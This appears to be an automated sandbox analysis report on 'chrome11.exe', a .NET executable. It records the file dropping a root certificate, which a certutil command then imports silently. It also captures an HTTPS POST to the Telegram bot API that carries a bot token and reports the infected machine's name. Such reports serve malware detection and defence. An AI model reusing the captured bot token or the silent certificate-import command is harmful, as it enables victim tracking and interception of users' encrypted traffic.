Preview:	0..f...0.."...H..............0...0......H..............0...0......H............0...0....H.......0......z...Z........e.....88....veO...3..I6U.o.4W.g..`...........U..~e..-.LH.Q..y.:..<".08.n..q.... ~.'L..+..OX.....~.Dva(`\k.(,}......2...5.:..b...].YEK....kU..../B."..kt..k...(.....HE....:[qxO....u.#y6.).@I.^....zms.w.6.W......~W..P`..b..=.y.....0%2.."....o..."[F.`.Jr`:.Kn..6`z_.......gRn.dL.:...[....k..\|.E............r.?'<Ij.lNq1._.'...t.PX.&.J.Q.hgA......X.p.62.!A.}.z..m..N...'..W..#.m..G.C./..k.h,2x\...6....S.([.oE.}.F..hv..sB.ifk.....b....r....SLb.~.X...'.}..@....#.C.....~....T.1.....!....I.B..U..}...,bjb...;7....V)....(.OM..?...].g.'..I.Rm.q......C(..Z.--..6..eS...$..v.T................l..a.E....H.......+..E..b.<.3.Q........G......'..n..bT..}h..u....\.M..S8..e.2...,n..KN......D... 2."9..P6x.;T..6.oc.{.,..U~IcH+.......U....CS.......N.IR.f......Ke,.t7.l..tz..n...X8...G.bb>>...M.C/i.V6.v.."..l!4b...........2..z....\..U...L..C/").....t.8.....

C:\Users\user\AppData\Local\Temp\unique_laptops.txt

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.792376622970446
Encrypted:	false
SSDEEP:	3:mUUSjjBRQfjTi:mUUqQfC
MD5:	3A71000F5EADA63AEF123A8B950F1822
SHA1:	26307D735696B43C7E7E1B67DDA759422C748191
SHA-256:	0DAB958E48071156D5B78E6410DB8CAD5C3D97BF371EF630C5CA27D54176BC85
SHA-512:	3893D03FB95E0A000FCC02362CEE0295859DF9FC024D045CF9E3840881592D7E79CCCA25FE3E1BD3D39C0AF52937115A5E3FE4D5751B7EFFD36BAA896073B72A
Malicious:	false
Preview:	701188_EC:F4:BB:45:F6:9C..

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\84ef8e32cf3dd22e15e36759d999f0aa_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	data
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	0158FE9CEAD91D1B027B795984737614
SHA1:	B41A11F909A7BDF1115088790A5680AC4E23031B
SHA-256:	513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
SHA-512:	C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\C3DAC379B834C7676F11C5756DB72DFAC6DF57BE

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	data
Category:	dropped
Size (bytes):	1154
Entropy (8bit):	6.715437500843891
Encrypted:	false
SSDEEP:	24:6Xop6tlWOd5wr2i2s/70hJmyq3VuwK8LaYOUyHyR6XM0Z:JAxd5wR9T0hJFqE8uYOUcBZ
MD5:	0CB84A237808471C4E4168AF94FF236E
SHA1:	9B611848627AA83119AC8088AD78016B9E4A5BF1
SHA-256:	B4B63A320D7A10BDEB7D162789E0AB50CF5A919EA7258963869D8C9088AFE53C
SHA-512:	F01FDEBABEA73706F0FAFC84AFBBA70B9E29C81E799AA93F85C06676F9DBD0E7FEAE5D778B40BBBE25CAA948C991FCE358097B0DDE77E28A6709269D6ADB98EF
Malicious:	false
Preview:	........H...T.i.t.a.n.i.u.m. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y................h04O.i.&...gQ6J]?.s...............y.4.go..um.-...W.................l.......................C.N.=.T.i.t.a.n.i.u.m. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y.....M.i.c.r.o.s.o.f.t. .E.n.h.a.n.c.e.d. .C.r.y.p.t.o.g.r.a.p.h.i.c. .P.r.o.v.i.d.e.r. .v.1...0..... ...........0...0............G;.\|c0....H........0.1,0..U...#Titanium Root Certificate Authority0...231218115222Z..270323115222Z0.1,0..U...#Titanium Root Certificate Authority0.."0....H.............0.........\|......x._.3<.\|J...jC.95Ww.8..m.e.c.j`t.10c........./..W.h.S....A...mU.{.........`...b.;...K...,.T...9.b.pFS<^.........C.....T...zSq<jF...gX...Q.~.`/}..O.... @.U.-........C...T.....8.vI....iC....xm.....P_.n?"@.,.._#..f........1...C..)..(_k......(0&0...U.%..0...+.......0...U.......0....0...*.H..............sh.....i4.y.P..v....i9.l...cx.....J..&...t...n92.X....J.....M.]{.}..Q~..AV..5.P..c.....U.4J.4..

C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\186830344FB169AC26ABDC086751364A5D3FEC73

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	data
Category:	dropped
Size (bytes):	248
Entropy (8bit):	3.3699684886507324
Encrypted:	false
SSDEEP:	6:+Pk/DMyla8IKx0/ByD+G6sLnA0A2oiG/o:+P2zKCUB5G66A0giG/o
MD5:	B44CE4E72AE2649724DF2D7954748100
SHA1:	5959557BD241FB58B1D7A2808B9903D716CD2C7F
SHA-256:	E540DD5FE4BA807F0AEDE8445FD749BE03C3970DA1429A53125B5BB1812AC544
SHA-512:	D59BDE58E225FDAC89886874B05C7B90FE41F0236D0B2A3FBA989DDB9568928051ED1B2FBA4FFB3D811CE43FA67D4BBE1FF9DABFE0C9A2E2A247574B25500116
Malicious:	false
Preview:	................l.......................C.N.=.T.i.t.a.n.i.u.m. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y.....M.i.c.r.o.s.o.f.t. .E.n.h.a.n.c.e.d. .C.r.y.p.t.o.g.r.a.p.h.i.c. .P.r.o.v.i.d.e.r. .v.1...0.....#............h04O.i.&...gQ6J]?.s

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.902097026291253
TrID:	Win64 Executable GUI Net Framework (217006/5) 47.53% Win64 Executable GUI (202006/5) 44.25% Win64 Executable (generic) Net Framework (21505/4) 4.71% Win64 Executable (generic) (12005/4) 2.63% Generic Win/DOS Executable (2004/3) 0.44%
File name:	chrome11.exe
File size:	4'767'744 bytes
MD5:	5b39766f490f17925defaee5de2f9861
SHA1:	9c89f2951c255117eb3eebcd61dbecf019a4c186
SHA256:	de615656d7f80b5e01bc6a604a780245ca0ccefd920a6e2f1439bf27c02b7b7a
SHA512:	d216fa45c98e423f15c2b52f980fc1c439d365b9799e5063e6b09837b419d197ba68d52ea7facf469eae38e531f17bd19eaf25d170465dc41217ca6ab9eb30bf
SSDEEP:	98304:DSPVtfXC+vyr+LzwQqnySs6llVYOTGFl5hShc8Q6AAqe6oahURFPvl5JTBEKY6aI:DSLXC+DOTGF/hSx/087
TLSH:	E926E5B4FAA4DA33D16A9271416B531053A4BFD7A33293471B7C325E898A7881F311FB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Vg..........".......G...........G.. ....@...... ........................I.......I...`................................

File Icon


Icon Hash:	173149cccc490307

Static PE Info

General

Entrypoint:	0x87fb8e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6756FEF4 [Mon Dec 9 14:30:12 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [0087FB9Ch]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
jo 00007F8BE51DC80Dh
inc edi
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ah, dh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x47fb38	0x54	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x480000	0xdcd6	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x48e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x47fbac	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x47fb9c	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x47dc15	0x47de00	5ceedc658c5649b95f964ce02f43eef1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x480000	0xdcd6	0xde00	0d0799c709de77ebfcd7a616870053c0	False	0.733618384009009	data	7.300073276108226	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x48e000	0xc	0x200	bce9ae23dfbc6572d8209a860e0b2fe8	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x480268	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.4913294797687861
RT_ICON	0x4807d0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.46435018050541516
RT_ICON	0x481078	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.39072494669509594
RT_ICON	0x481f20	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.6214539007092199
RT_ICON	0x482388	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.4298780487804878
RT_ICON	0x483430	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.32863070539419087
RT_ICON	0x4859d8	0x7cfc	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9984998124765596
RT_GROUP_ICON	0x48d6d4	0x68	data	0.7019230769230769
RT_VERSION	0x48d73c	0x3b0	data	0.4046610169491525
RT_MANIFEST	0x48daec	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 12:52:19.859157085 CET	49704	443	192.168.2.8	149.154.167.220
Dec 18, 2024 12:52:19.859194994 CET	443	49704	149.154.167.220	192.168.2.8
Dec 18, 2024 12:52:19.859308004 CET	49704	443	192.168.2.8	149.154.167.220
Dec 18, 2024 12:52:19.885808945 CET	49704	443	192.168.2.8	149.154.167.220
Dec 18, 2024 12:52:19.885831118 CET	443	49704	149.154.167.220	192.168.2.8
Dec 18, 2024 12:52:21.254244089 CET	443	49704	149.154.167.220	192.168.2.8
Dec 18, 2024 12:52:21.254409075 CET	49704	443	192.168.2.8	149.154.167.220
Dec 18, 2024 12:52:21.300018072 CET	49704	443	192.168.2.8	149.154.167.220
Dec 18, 2024 12:52:21.300036907 CET	443	49704	149.154.167.220	192.168.2.8
Dec 18, 2024 12:52:21.301047087 CET	443	49704	149.154.167.220	192.168.2.8
Dec 18, 2024 12:52:21.353276968 CET	49704	443	192.168.2.8	149.154.167.220
Dec 18, 2024 12:52:21.440458059 CET	49704	443	192.168.2.8	149.154.167.220
Dec 18, 2024 12:52:21.487329960 CET	443	49704	149.154.167.220	192.168.2.8
Dec 18, 2024 12:52:21.873452902 CET	443	49704	149.154.167.220	192.168.2.8
Dec 18, 2024 12:52:21.883896112 CET	49704	443	192.168.2.8	149.154.167.220
Dec 18, 2024 12:52:21.883907080 CET	443	49704	149.154.167.220	192.168.2.8
Dec 18, 2024 12:52:22.364404917 CET	443	49704	149.154.167.220	192.168.2.8
Dec 18, 2024 12:52:22.377343893 CET	49704	443	192.168.2.8	149.154.167.220
Dec 18, 2024 12:52:22.377438068 CET	443	49704	149.154.167.220	192.168.2.8
Dec 18, 2024 12:52:22.377537012 CET	49704	443	192.168.2.8	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 12:52:19.705658913 CET	63245	53	192.168.2.8	1.1.1.1
Dec 18, 2024 12:52:19.844059944 CET	53	63245	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 18, 2024 12:52:19.705658913 CET	192.168.2.8	1.1.1.1	0x46d4	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 18, 2024 12:52:19.844059944 CET	1.1.1.1	192.168.2.8	0x46d4	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49704	149.154.167.220	443	6220	C:\Users\user\Desktop\chrome11.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 11:52:21 UTC	217	OUT	POST /bot7587476277:AAEN7p2yOtrq884E9izAnIDu8WeE8vTqRjY/sendMessage HTTP/1.1 Content-Type: application/json; charset=utf-8 Host: api.telegram.org Content-Length: 95 Expect: 100-continue Connection: Keep-Alive
2024-12-18 11:52:21 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-18 11:52:21 UTC	95	OUT	Data Raw: 7b 22 63 68 61 74 5f 69 64 22 3a 22 37 31 30 35 37 30 39 38 31 33 22 2c 22 74 65 78 74 22 3a 22 53 79 73 74 65 6d 20 4e 61 6d 65 3a 20 37 30 31 31 38 38 0d 0a 4e 65 77 20 6c 61 70 74 6f 70 20 64 65 74 65 63 74 65 64 20 72 75 6e 6e 69 6e 67 20 74 68 65 20 70 72 6f 67 72 61 6d 21 22 7d Data Ascii: {"chat_id":"7105709813","text":"System Name: 701188New laptop detected running the program!"}
2024-12-18 11:52:22 UTC	722	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 18 Dec 2024 11:52:22 GMT Content-Type: application/json Content-Length: 334 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":3623,"from":{"id":7587476277,"is_bot":true,"first_name":"calliebot","username":"callie_thrubot"},"chat":{"id":7105709813,"first_name":"Maik","last_name":"Fleischer","username":"MaikFleischer","type":"private"},"date":1734522742,"text":"System Name: 701188\nNew laptop detected running the program!"}}

Target ID:	1
Start time:	06:52:17
Start date:	18/12/2024
Path:	C:\Users\user\Desktop\chrome11.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\chrome11.exe"
Imagebase:	0x103a9a40000
File size:	4'767'744 bytes
MD5 hash:	5B39766F490F17925DEFAEE5DE2F9861
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:52:23
Start date:	18/12/2024
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\user\AppData\Local\Temp\tmp267C.tmp"
Imagebase:	0x7ff7a59e0000
File size:	1'651'712 bytes
MD5 hash:	F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:52:23
Start date:	18/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	13.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFB4AD74D32 Relevance: .5, Instructions: 456COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2462911844.00007FFB4AD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4ad70000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdbd16dfc3d022b2eb572b63a473834ecc1c17357dbf0eb0f5f4b7a8604d5a37
Instruction ID: 6d6f69777ad601ab03c85db79d885570d69e3321318cb8fcbde18a63c409f022
Opcode Fuzzy Hash: bdbd16dfc3d022b2eb572b63a473834ecc1c17357dbf0eb0f5f4b7a8604d5a37
Instruction Fuzzy Hash: F0E1C570A0CA4D8FEBA9EF28C8557E977D1FF54310F14426EE85DC7291DE78A8418B82

Function 00007FFB4AF71259 Relevance: .4, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2464334471.00007FFB4AF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4af60000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28d0585adbf405506c2801c10086c69415bffe23ca581f422b04264d9ce55479
Instruction ID: 1891cf27ffc53be6139fc7df0bf541376410c94b37dce36076af45603a8a8127
Opcode Fuzzy Hash: 28d0585adbf405506c2801c10086c69415bffe23ca581f422b04264d9ce55479
Instruction Fuzzy Hash: 92E13AB0A096198FDB99EF78C851BA8B7B1EF59300F6404E9D40DE7292CF35AD85CB11

Function 00007FFB4AD75EDE Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2462911844.00007FFB4AD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4ad70000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dddc5632a67aaca4f9739ea4876363eda31d2e0a0a092b9774bdd16430d4c172
Instruction ID: 97fd46d277bb06321f50ad72cdfb993dd4b8722a35255667f5cda53c8fd5007e
Opcode Fuzzy Hash: dddc5632a67aaca4f9739ea4876363eda31d2e0a0a092b9774bdd16430d4c172
Instruction Fuzzy Hash: E8512DB0D19A1D8FDB89EF68C8956ACB7F1FF59341F5400AAD40DE7292DA35A881CB40

Function 00007FFB4AD7A039 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2462911844.00007FFB4AD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4ad70000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd2d1c6ae304165c103a0f1dcc030388aceedc8a5a302826420c8c1d723ac146
Instruction ID: 57b6cfc3b39c0304ae275006b7e5b1ec4be2b085fb178fbf541a38da33d17bca
Opcode Fuzzy Hash: dd2d1c6ae304165c103a0f1dcc030388aceedc8a5a302826420c8c1d723ac146
Instruction Fuzzy Hash: E4513874E092198FDB59EFA8D5946FDBBB5EF49300F6000BED049A7292CB396841CB50

Function 00007FFB4AD7AFC2 Relevance: 1.6, APIs: 1, Instructions: 128
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetSetOptionA.WININET ref: 00007FFB4AD7B076

Memory Dump Source

Source File: 00000001.00000002.2462911844.00007FFB4AD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4ad70000_chrome11.jbxd

Similarity

API ID: InternetOption
String ID:
API String ID: 3327645240-0
Opcode ID: 6182be8abaa1f8605fcca0e352bb7704cb451a472e50b2aa1badf762477e4c41
Instruction ID: bd21eb08259521b6e4ace411e73d2b8320379b540c5ade2d1bdbdeaa9284028b
Opcode Fuzzy Hash: 6182be8abaa1f8605fcca0e352bb7704cb451a472e50b2aa1badf762477e4c41
Instruction Fuzzy Hash: 13313C7190CB588FD7099F68DC456F97BF4EF56321F00427EE049D3152C664A856C791

Function 00007FFB4AF75236 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

O:_L, xrefs: 00007FFB4AF752E3

Memory Dump Source

Source File: 00000001.00000002.2464334471.00007FFB4AF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4af60000_chrome11.jbxd

Similarity

API ID:
String ID: O:_L
API String ID: 0-2307308305
Opcode ID: a0734a84a8c8feba5b3835f4400e10c0f6642b393538cdcba78ed2d1e2c09b1d
Instruction ID: c22bc29bba43d64db4a8ec5f7e46558d0bac965552b5b641bd1bbfd653ce7d66
Opcode Fuzzy Hash: a0734a84a8c8feba5b3835f4400e10c0f6642b393538cdcba78ed2d1e2c09b1d
Instruction Fuzzy Hash: 79517375B1CE0A4FEB98EE6CD49557C73D2EBAC71171401B9D48AC32E6DE24BC428781

Function 00007FFB4AF658C1 Relevance: 1.4, Strings: 1, Instructions: 141COMMON

Download Yara Rule

Strings

$, xrefs: 00007FFB4AF659A7

Memory Dump Source

Source File: 00000001.00000002.2464334471.00007FFB4AF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4af60000_chrome11.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: e9ef15ab717a73c239527aa786b4d6bd8646314c5818f92fd4882a0179b558b7
Instruction ID: 5e0fc1436d122988b9d767e5635cb80a0b70245b1e146112f6b4be5985d4f848
Opcode Fuzzy Hash: e9ef15ab717a73c239527aa786b4d6bd8646314c5818f92fd4882a0179b558b7
Instruction Fuzzy Hash: 5941A7B191864D8FDB48EF68C8556F97BE1FF5C714F1402AEE84AE7281CA34A9528780

Function 00007FFB4AF63B3F Relevance: 1.1, Instructions: 1136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2464334471.00007FFB4AF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4af60000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccd9a215ea8825d973b1da0d7137177909f7cc2a49c16c062e1b0025e287fb05
Instruction ID: ece5726ac45ab5dc27393bcd7012aad69dfcd76cb9108d1a21a896af60d53a6a
Opcode Fuzzy Hash: ccd9a215ea8825d973b1da0d7137177909f7cc2a49c16c062e1b0025e287fb05
Instruction Fuzzy Hash: BBA2EAB0909A198FDB99EF28C994BA8B7F1FF69341F1441E9D04DD72A1CA35AD81CF40

Function 00007FFB4AF63A60 Relevance: .5, Instructions: 523COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2464334471.00007FFB4AF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4af60000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d9e5850e0f16e512cff71ba6437ff2857bcde485783e1577d4fb1a397a68c28
Instruction ID: ca02ff067bfa926a56708881672e7d2258df774012fd233833d623ef3ec3f935
Opcode Fuzzy Hash: 4d9e5850e0f16e512cff71ba6437ff2857bcde485783e1577d4fb1a397a68c28
Instruction Fuzzy Hash: AD228670918A2D8FDBA9EF28C894BA8B7B5FB58701F5041E9D00DE7291DA359E81CF40

Function 00007FFB4AF6BF4D Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2464334471.00007FFB4AF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4af60000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c2927c08b2be1539661ce7daefc0360666bef9655cf680c458da3b59456b8c3
Instruction ID: 4f5f4d073241d0fdbbaa2b58be4bdab9690ca4cd2a7bde161595d5e9a198c59b
Opcode Fuzzy Hash: 9c2927c08b2be1539661ce7daefc0360666bef9655cf680c458da3b59456b8c3
Instruction Fuzzy Hash: 6FD155B0908509CFDB09EF68C591AFDB7B5FF58300F2445B9D40AD7296DA39B842CBA4

Function 00007FFB4AF61CD7 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2464334471.00007FFB4AF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4af60000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70b8188e1ee8b7e11e3c373fdf55f6bf77fb07aa4eca103b331bf6c094464227
Instruction ID: 95eb19eef2222e4e0b11c616a07d4b31b28a1dd8aaabc0850d6e462c933ed2af
Opcode Fuzzy Hash: 70b8188e1ee8b7e11e3c373fdf55f6bf77fb07aa4eca103b331bf6c094464227
Instruction Fuzzy Hash: D0A12DB1D1C95A8FEBA4EF68C9557E9B7A5FB58700F2001FAC04DD7291DE386982CB40

Function 00007FFB4AF74032 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2464334471.00007FFB4AF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4af60000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a53dc332bb8de517dbaa19c583d0eba070ab2e4608a973c58b9ec01ff556c9d0
Instruction ID: c0465f423c305f2c621d9ca072d1b30b4a940bd0d22e3783a4a01eaa3282f55f
Opcode Fuzzy Hash: a53dc332bb8de517dbaa19c583d0eba070ab2e4608a973c58b9ec01ff556c9d0
Instruction Fuzzy Hash: 88A12AB4D0861D8FDB99EF68C484BADB7B2FF58301F2041AAD00DE7295CB34A985CB50

Function 00007FFB4AF65D4B Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2464334471.00007FFB4AF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4af60000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e98de4d5082763ca4b8f059af268e27a29755de58d7388bd6822faf8b4e3580a
Instruction ID: 564793ae837bfcdf8b7f2daa57c13e6a80bd5332e7ab3632ac1fd587e30f970e
Opcode Fuzzy Hash: e98de4d5082763ca4b8f059af268e27a29755de58d7388bd6822faf8b4e3580a
Instruction Fuzzy Hash: 65913D74A1C6498FCF49EF68C9959ACB7F1FF6C704B2441A9D44AE7296CA31F842CB40

Function 00007FFB4AF74BFA Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2464334471.00007FFB4AF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4af60000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 072d88492af83bbf7229ee9dbbb58e85a679d53b88dd9ee487c4f3e88cc6110a
Instruction ID: c33052163e4deb8bf0b92185d98598bdbaf6c8329a1b24cf7e604b94a0227119
